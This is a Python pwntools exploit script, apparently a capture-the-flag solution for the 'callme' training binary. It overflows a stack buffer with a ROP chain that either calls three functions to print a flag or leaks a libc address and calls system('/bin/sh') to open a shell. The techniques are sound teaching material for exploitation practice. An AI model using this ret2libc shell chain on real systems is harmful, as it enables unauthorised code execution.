from pwn import *
# Target binary. Assigning it to context.binary lets pwntools derive its
# architecture settings from the ELF, so ROP()/unpack() below match the target.
elf = ELF("callme")
context.binary = elf
# Terminal pwntools spawns for gdb.debug() when the script is run with GDB set
# (see connection()).
context.terminal = ['konsole', '-e']
# `logging` is re-exported by `from pwn import *` (stdlib logging module).
context.log_level = logging.INFO
# GDB commands run before the target continues; only used in GDB mode.
gdbscript = '''
set follow-fork-mode parent
break *pwnme+0x59
continue
'''
def connection():
    """Launch the target binary and return the pwntools tube talking to it.

    With the ``GDB`` script argument the process is started under gdb using
    ``gdbscript``; otherwise it is started as a plain child process.
    """
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gdbscript)
    return process([elf.path])
# Stack buffer size assumed for the target (from the name; confirm against the
# binary). main() prefixes every chain with BUFFER_SIZE + context.bytes bytes of
# padding, i.e. the buffer plus one machine word, presumably the saved frame
# pointer.
BUFFER_SIZE = 32
# Maximum number of bytes the target accepts per read; each chain is checked
# against this bound before being sent.
READ_SIZE = 512
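def main():
    """Build and deliver the ROP chain, then print the flag or hand over a shell.

    The mode is chosen through pwntools' ``args``:

    * default: chain ``callme_one``/``callme_two``/``callme_three`` with the
      three fixed arguments and print the ``ROPE{...}`` line the target emits;
    * ``SHELL``: print the GOT entry of ``puts`` and return to ``main``, rebase
      ``elf.libc`` from the leaked value, then send a second chain calling
      ``system("/bin/sh")`` and drop into interactive mode.

    Raises:
        ValueError: if a built chain exceeds ``READ_SIZE`` bytes.
    """
    chain = _stage_one_chain()
    c = connection()
    c.sendafter(b'> ', chain)
    if args.SHELL:
        _leak_libc_and_spawn_shell(c)
    else:
        # In flag mode the target itself prints the ROPE{...} line.
        print(c.recvregex(rb'ROPE{.*}', capture=True).group().strip().decode())


def _padding(rop):
    """Return filler up to the saved return address.

    BUFFER_SIZE bytes of buffer plus one machine word (presumably the saved
    frame pointer — confirm against the binary).
    """
    return rop.generatePadding(0, BUFFER_SIZE + context.bytes)


def _checked_chain(rop):
    """Serialize *rop* and verify it fits the target's read size.

    An explicit check is used instead of ``assert`` so the guard is not
    stripped under ``python -O``.

    Raises:
        ValueError: if the chain is longer than ``READ_SIZE``.
    """
    payload = rop.chain()
    if len(payload) > READ_SIZE:
        raise ValueError(f'ROP chain is {len(payload)} bytes, limit is {READ_SIZE}')
    return payload


def _stage_one_chain():
    """Build the first chain sent to the target (see main for the two modes)."""
    rop = ROP(elf)
    rop.raw(_padding(rop))
    if args.SHELL:
        rop.puts(elf.got.puts)
        rop.main()
    else:
        callme_args = (0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d)
        # Plain loop: the original used a list comprehension purely for its
        # side effects, building a throwaway list of None.
        for address in (elf.plt.callme_one, elf.plt.callme_two, elf.plt.callme_three):
            rop.call(address, callme_args)
    return _checked_chain(rop)


def _leak_libc_and_spawn_shell(c):
    """Consume the leaked ``puts`` pointer, rebase libc and send the shell chain.

    Args:
        c: the pwntools tube returned by connection(), already past the first
           ``sendafter``.
    """
    # Presumably a status line printed before the leaked pointer — verify
    # against the target's output.
    c.recvline()
    # The leaked word may arrive without its high zero bytes, so pad it back to
    # a full machine word before unpacking.
    puts_addr = unpack(c.recvline(drop=True).ljust(context.bytes, b'\0'))
    libc = elf.libc
    libc.address = puts_addr - libc.symbols.puts
    rop = ROP(libc)
    rop.raw(_padding(rop))
    # NOTE(review): a lone `ret` is placed before the call; presumably for stack
    # alignment — confirm.
    rop.raw(rop.ret.address)
    rop.system(next(libc.search(b'/bin/sh\0')))
    c.sendafter(b'> ', _checked_chain(rop))
    c.recvline()
    c.interactive()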
# Script entry point. Modes are selected via pwntools' `args` (GDB and SHELL),
# read in connection() and main().
if __name__ == '__main__':
    main()